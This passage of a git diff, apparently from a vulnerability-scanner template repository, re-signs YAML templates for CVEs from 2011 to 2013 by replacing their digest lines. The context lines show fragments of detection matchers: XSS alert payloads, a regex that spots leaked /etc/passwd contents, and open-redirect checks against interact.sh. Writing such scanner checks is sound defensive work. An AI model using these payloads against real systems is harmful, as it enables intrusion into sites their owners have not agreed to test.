4a0a00473045022100fe31bbad347873e4740bbf0426a51ae406395087e40457c6cbd79d8f9c026c0e02203e8eac8d3468cf61638e4adb439fa0cdd3de2eae74243b69a208f4ab367566f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d24ab04cba8594d1f415e0e720af4bd4237450c76b339c3906cbacb45ba128b6022100d0ffeb9aadb927300e9a6fad25bd8a56203b1d4dbd37d1cecb18a194cf24d503:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-3600.yaml b/http/cves/2011/CVE-2011-3600.yaml index c91a5a6a0ab..f422722c91f 100644 --- a/http/cves/2011/CVE-2011-3600.yaml +++ b/http/cves/2011/CVE-2011-3600.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203d71b8c774dd56e0dbb60328dc1790ae22d01285cca3d034843e5d6180f76638022033349aa636e4f1b6895d29809dd6d622b058687e0aa18be4a79ece9667529a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015939729f8fd9b2ff8c6f5da99dd9d6723b16094473a74d9d6671c0cb953d045022100bb01b489a6c4c768aea83e9cb879c1cb931481b4925ad4e36f6603ce968f9eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index d659e22f5d4..6b821f98824 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203b6f491432e15d55d9c8ed123ee8ff6dc88b005753d71cb118ae4ddb508121010221008b2b2da641d77f1d895708bbb0d85eccfc591e772d6102c3591ffccab5b9acd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e95994f69c6e24bd05f21aad33d9ec654db7bc23cc556b4dcf0f022fca4ea6100220655321d885b818093df551322d2a23cc4487d68d078d980ff398edd2de26790d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 9dfa84d7b42..129b79c5ccc 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -46,4 +46,4 @@ http: - 'contains(body_2, "</script><script>alert(document.domain)</script>")' - 'contains(body_1, "Advanced Text Widget")' condition: and -# digest: 4b0a00483046022100cfa2ee8d80810e5288f4671b7f327c957b8fca4a10408bb7e173215952ec48470221009ef4279865e522365aca900da357c0816fd693dd7ef4de618094dc339c1e22cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203619e86784c52cadabec6f54e7ecd01cf420f59cab5832f4f8b8e4f1c3d9930202204c95b14bfcacc59f73281920ad201d953b9d9ee98205cc4161ccd69e571087ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 2f3c25c1508..6cfb0b6b127 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022022b61e7f00464066b92bddf79096454c4cd46706c67ffb4c80a46dc6fac1cb7e022100a0b62665a9e6971e2aa248b6f2822f86c4235c713a2f92a8cb138c90388906ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a52f2cf0caec41c4487ab514fd7264af1979de46b230bbf63c3d5a3a579c3d2d0221008461c4d4f0c7388a5d2d4208fd5d6f6647a71559f0fc9e54c90a6bde76a75c0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index bf220a53d56..9ba3aaae7df 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -59,4 +59,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 4a0a00473045022054586c67a2c2b15ab6f4a3d34df1399b1d92c653c634a175564609e796678c96022100a2ed279516c70347f053f2c5ec3348ab1a0cb6b4d53f14110ef9186963ea759a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b7a643bf9272c610291a7cd8c0a28801e7945f3f5477608c6bba80d79ae59de02200cfa9241fff1618894a7037c395e8d1c4d444062f4c4f5ce5a8f3a1e4d0030a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index c926701dd89..0569a3fdb6a 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204869a92620a65d21f8a1bf33aba64ca6ef342c7df09486decbde9b01597861de0220064127180020021ad15ade128255688fd8b7bbe2a8abcc4efae229c021450521:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033aca2308c23b66a32ea5529afb1e2badafcd2e7f16cdf93ef42db25043995340221009cacde9d5c44377949550282b0f33f5cc786664b589c17fcf2dcbc3f326ddc50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 329bf73a598..e70c29376b1 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022038e1093c8bd22efa5d86d598887b3dab443e395bed61fb7080c985f2fb2b23ee0220305084310461920154ca9c55dba5a2dcc7ae5e9b3357ea66c3d8958e45e33a5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022013af195ed6aa9cece222acad7cc74e3e8e0f18bc1ca79d27f40cd659ab530a990220049f0407f6f0501533b876b755f229380c7c14f3fdf77ff00d990b48881a9374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 02956e57849..9f387188e69 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ce83cd7c3927786b92443ffc6dddeff142641a620cb77d896184c4bc99a1175022100f9d67cb47c88bfd57b73f587ed583cd9a2920e1c76b79eec96d9169f1dc3d0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022017091fd7dfa2aa3d7964a0cae182f74a3bd796aa0a54d938b7a42aff99471e35022100d210041f91ff8d6b1cd68997faa8bc31f4a991b4d870fa81f9c56c01d1e56875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 2b69754d906..dc3786d5875 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cde075bd7eb7e7f0b4a90548c28d047cfc0fbe932b22c12d294dc068952820c02205c6b0b46250ee76eb6161dcd97e967d4012b2bd97e46307f21a4e19ef8a51b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200267a8161fad94156d50eb29266b65893549ffd4bae33ed1808a23a21cb81b55022100b4b4d514367574e42887b54408737843c281420bf18397770e869be2ed4d2bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 8d2f171906a..c8bfdaa8a89 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204695a5702a070191c7622bd9eacbe298f29a97d7c142a22ab3afb9f83c130aa6022061cc70b24a9592c7cb7bd85bdf87ed408022fb269fc6604f7c123232b73989e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007315459867240f363551afae9ff21febcbb0ac7b8b8f5fd29dcfcf0dac2d2970221008aaeecf511a0356701db408fe14337ca71533a7fad72626acd890b0b4cdc83ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index ef424879edb..e69819fb1d3 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022056ab24e7ba726a7bc07059ce2674b3bde9c7c518767a97ed4eb67e69399a0f7e02201cc3b2d3a90417ff613e1ca2e06a03bcd0d47fc46c68f03559d919fec7723fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c562c63980c2e68fcfb151c771b90946fa86f7b3703a0adce2be320b1479a0602205656430885da51cb669118a5728e2796c95cf0897ec2bbeba27ebc7fd7de2ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index f7ad44d2568..cac1ee76be1 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100a33d5db44a0268d71065f1cbab321a36e304d099a364319dfd05d85f99f69d8d022100f3b41a40d52f04450631018dd4e01765b965d35af1e8adc83f0f074bfd1eb743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb08e5dd6a81ed144818652f532d1b812700510fe80715481c74eccb1deff9d3022100d5d8213249e8891f2ff61c8ab1206f6cb63c4213b6861ad7d0db4883c26751d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index c50509f1223..a7a7cf03745 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a56a923e8312a05abe13e1ce0ee1efb6587d283d551e9a1291ace9040ac1586d022100e89ec549322b5aa6f712b6d1f5fad958efd68a91bcddf35a0e1e3cf14c1430d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c88dd4a4447f2fcf03760eef120e6b10d83968e75a49332aa1f655cc340757e022100defadd6c3bdb826010ecab21905173282923a8ca3de07cccc401e66238e2405c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index a7fd6197fdb..fe50eb88ce2 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022065376dde9731d7bd45db80805a661e5d861014a67d9d31a5d31cb94a296cd84e02200d74b330c87ba80c731a466a3a021c4272752641e0b8501d962292cc3fd509da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a7c5f429a54ee3d7e6a2fe677c1638a2ef1ca192880f15cbbed51a52ce3c2c10220259fd86802b867bc94888166e4af7571c03cb508577462e4d1fb1004b09aa8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 45a5be40c3a..8c819d1b8c3 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b7c9137455a50836210f02033a2d859d8932e292f25deb8c5f7b9140178606840220367afc570497ea2db91a59072769e4f1e8fa29f78bdf6f2106700b3f25e0d8e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d99e0efe4c72295c08e67d344903186ca311ebca08280a0c7cf57b7867646bff0220545d810f4a4109ccda61d05341ec18e0492b0ec245fa78034ec216cce33dc1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 7dc3de8cbbe..5841f9284c0 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203425086f5cbbc03cbdfd10c7743c6f8f3c4db09cee11401698f42361f1b1659002205ff638f4f111036977689f97f0f2288ffcc52264eea0cc84642fc5642b32e6a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afbb3294def103a152b4b1243e33c64f130a9af7855d5941b24137d28943b21b02201f54a66763a7856dc699d32e2fe829649de93cd0a4e5d0e387f1d62f217a3061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 2c8e8cb71d1..8e757402ff3 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013725649931ebcdc3e234faf1965ef2d3fde122377cf650a05dd79905baaa97c022061f1601b2b517e57daf31ff9fdd925a2516ca0c1378466fc38deb0a3aaaccac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203386cfdced8e3b19ca713c6dc054ceda33a15b5d62dcc61a01bd957c4b729da002206d0c63bef2c1a09867c000d46aa7d421d2aeacfbb7360fd02beef01131df685c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-10018.yaml b/http/cves/2012/CVE-2012-10018.yaml index 2526ed7c1a7..afa3efa9ad5 100644 --- a/http/cves/2012/CVE-2012-10018.yaml +++ b/http/cves/2012/CVE-2012-10018.yaml @@ -105,4 +105,4 @@ http: - status_code == 200 - contains_all(body, "<img src=x onerror=alert(document.domain)>", "mapplic-mapdata") condition: and -# digest: 4a0a00473045022100ffb822a45e76d15f8616ddf7ef46b3d944905b03f0c619c5d0103370a450b32002205175bfe6bb11a79f8c67bc09a1b5c7457923bb36f1fa26a4f2722a5080513d22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f3495e6fddcf07d3c02762b76e2d6d515e6c910f0aec538a9d4b8bb7d4eb73f0220485984bbab94e1e7d7624889ad18d74d32bbe8ea92c73726ffa48863fc100b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 9879b6b99fc..045020f4cf9 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bf7372fae0114b8d10c29cb224eafd60b47d319eeb07d5a7cb3cf64c34fc7d8502206e45a84bdf2fad1fe5405fdddc43fe7c7c2fe4d95ea8acde4921c51a55954971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cda608ce3f3d0b9a64002b56424ccf4a917175b0d5f425ed697a4133a9fbaede02201c50c63dba5b8785e313c7542f3d987d1d224e37b46de774fe58507701cbc2cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 43867b10c2c..db6e18bcba6 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -48,4 +48,4 @@ http: part: body words: - '{{md5(string)}}' -# digest: 4a0a0047304502210089d306ba6164d1ae512c1e6067c01fd7d58231ec92c3a7806d39b48a02f9be1e02202b8f8c2d0f23d5291b9f0cdce08acb90840869d7b2a61ab65914c4ae23322c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201aff94aaea46247c02e8fe97fb694a8569b5db69635c8149a6689c915f029a8a02203cd67a5c747dcd42d9a50befb0a31220acc7aaf4cc9e418625b8b88f4722dbec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index c8ea337af5a..6a5ccedf9ba 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203018b240da628c0db5985f899bcc5b57088880b835c1e93ef9267fb110e4417402207bdf17c48e13c8033fa16a6a63818676adc8a4a799ebf0f4f6db7ae8358ecb7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068eb55a9e2a359ab25c341ca3a0a1a4a110c60fa2c36e52a1d819d0d3241feb302202b5634b8ed9d26225f3bb4f1f49e56955e8baba78cc92e823a75a03285c970d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index aecb04c0994..a094d24246d 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -51,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022054b8c33c4ad964292952c568081813e1f099b736c761ec2e86d373d1a82edf9c022100a7349794e631c61fe0daf7ab318adc8e2e8800dfe2579957074b0a5066a2ec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009bcf7714b458f485d43d9d98a6e7e9a4144168ee0cdef1f2343502869e1ddc760220753369e76e99aaeb4054c18310b3487b1f4c6e44aa0030f99bf18a4dc9cf6cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index ae8e2e1f9d8..b5c92abe186 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a50eecb58b6698244549456b03ec6f73e22e2f73841ff5c1ad98ba345c81fe3b022049ff7e518fe583b12329f142b9bbaa080d5b5d4eb395bab0d3cd89da1fc7f20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ce4ac18e496c6ac891ec427a4a2422f0ab5300210edb45f723631496881d8e5022059c3b87fe55f13deb17b7bdfad4a680a146f1595b4cad77fca6d2a02de3c307c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 8f8cdf4885c..2983b0e9951 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f926b19f0b2dca317fbf3cb2e3ba05c08e56cd433d60a510f9be1f33be7459ab022100b93caa1fe25c3ca187dbcb701551274c733f131ef7ed2361ba7ef4f7aa245019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220258a4dd9d557c4895fcaee563fa2f5962a5ff7802fbff39fbbc1156b11462d9a022100c7e731188f18794fd4529d0ea0c43853cb44ce22aba32c43cde44831f9ca4ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 80375f1cc82..928db384a04 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2a54fea4de386a01bac9727c0eb91ac582ebe7474d1971110936c570bbbfdc40221009025543730e33e8992a254b177accac25d4f8b3c871c9e99b88164e7207664b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c92b3ce9206c1681dbf5831f578479836a53cd3924f9bad3f7385932eae33e55022035494b766737a2fa944e265eeddf4e67ec67608f7b1f4433c329676b222dbecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 77976bdf54b..cff1365cddc 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022060c7549f5bf91b89010573c5175437fb72adbbb54f27adb7876d898d6a6f4548022100991ce930f83b6a15bf9857ad2bbd2f5e079e7c52867b570fff7a39b5fd4efc14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058e0b74695fcf25dabcb21ff0a114363a394a7176342916b80d8db58e2de14dc02206d3717d6b5560878222f08844113c691ad680245a44ca135951145793d844324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 242f79d8a77..3ee9d0ceae0 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201d23b0ede42d6aca4cf4da4b5b519671e31626778727c32d11cf8fce8556fa650220645983c17cf19604998b1cbd50891209ef16bbf016d93b56e5c9becf2bcb73f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc22bdf72b3c466bd9f22764ce79e698885c41faac76ce5a9d28e0087b6323ae022100db9e6153fc9e856ff7dd67ce98180f075ab57760ebc9e9c1d4325a35c222f7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index b18e0bf4e72..faff01e56cd 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036efdc30128995af157bede62747cb9fd6188a63e88b0dc9a9c317f5f61d9875022100f23da2d075ddda6489d655b39bb7b2bc5eb22e51fce864bce1a6883ce49bd081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ddb1661f83603cc1c67a3fa129f0df11558b74f391e89c5653838128e4602a302206becae860116348d801178cc88b35e6162f30e0f4dab0638424b143ad97e607e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 2ea892051c3..77b0f9d8b9e 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100f49e2fff655c59d552de1d3b69bdef98af6f4ec5ee99c3250e0fe980735237cd022100a8546c75a87da381aa6aeaed27253a861ad24cf603d171fa5c6f27ac68562fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220379751a4a92ad02222ff1df19a4bc24cbe2dbd1eea9292e968ae5e1cc49dbee2022100fc168601d4bde518e080ccf3d50a1fc5c4a053c3ceb4f58e7eb04ef6686b5370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 2a22232072d..b9b05cd5381 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100be112e9602ce1d823e579d1b682094a446f1b10696dd60c3f5d93c328a808bf7022100d69af7093da91c0e48a2e85efc7c3aee27ba018dd8b480e011614a9567766ac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df2932db2651efd1a02d5fe5c0e0f82a0db26f367114ea6ad2a61ed19d3441370221008ab02fbfb2966d9f1f612f1bd5a07d25fc4417b5130a2863147b818d5101fa5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 5eca1cb15fa..12469981cd0 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cac29b425ec42aae62b498100f98c07c748940e6e2d12c1579359144aa795d1302203abbfea09fcd50c9660e7f0b685d286d8bf08b62886323e3c9f9e3f64301fc35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c02f56798d803da40eb4b2488debf9643ac36cd41ef0a7b4c21e26aa88dae1a02202d38731509ca1b857c5ae02c6f82dc349ab8a59edec6a5c73a814fdea2a88397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 74dbbb95e0e..699c82ad191 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100f7b2cd7b87bdef80d41760d53da007b8b3b80d25dd9707e862298eaeb4edef8b022100e684b52ce06e59983962b88dc044d4068211040c520dbc1dd41a34a96789c31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd169e295d92f02e796f099b16cf3e2f3febf90c516b66b5af852c5175cce7e40221009f722fc3236eef608f2fbfcebef1c6ef1d043db7faaf2f081615e58469fba770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 7fa34ea74bf..d9420d64e77 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220110d9b6e341d10ecf81abe4879975f40cacaeb1ce32cde8222a17bca44459de3022043019fd9044784ccec4055b9694f1a21721008a64aec1bb3cf998df7da23aa26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f1c4965db21859108322bc85afe159a5b9eb907e4dd77ebe1c042ceb42e186902206dc287b997d1a38ffe92d979e92cbdca96f28b6dd1d1cacb4774cd8bb9e36786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 1167a881f27..bc592f798a4 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022059e752f6cd9bc40ba93b9bc59061bd2eed7a2c6f1de5fbd945f6dac7ccd77dcd02203e9f297bb1c778e0cdad266632e72e97f55d9d5753c6e9aaa0603045fbdb2769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039190aa5ef86640e10a48f29ca1d4ae8b890d7cf3b8484c7a294fee7058f8ad10221008efee54a45b768b5d5eb42ca832f493abef117b9137e103261605740d4540ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 3f94791d199..06816cbff31 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100c97dcfbb405b10547598e08fd9c60669eeae51ed6507945e7dfcd271041b0038022100f76cd9511e598cb5fb27ab322caa4910a94dc3f4d33bccb82e07c3d6fc332e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 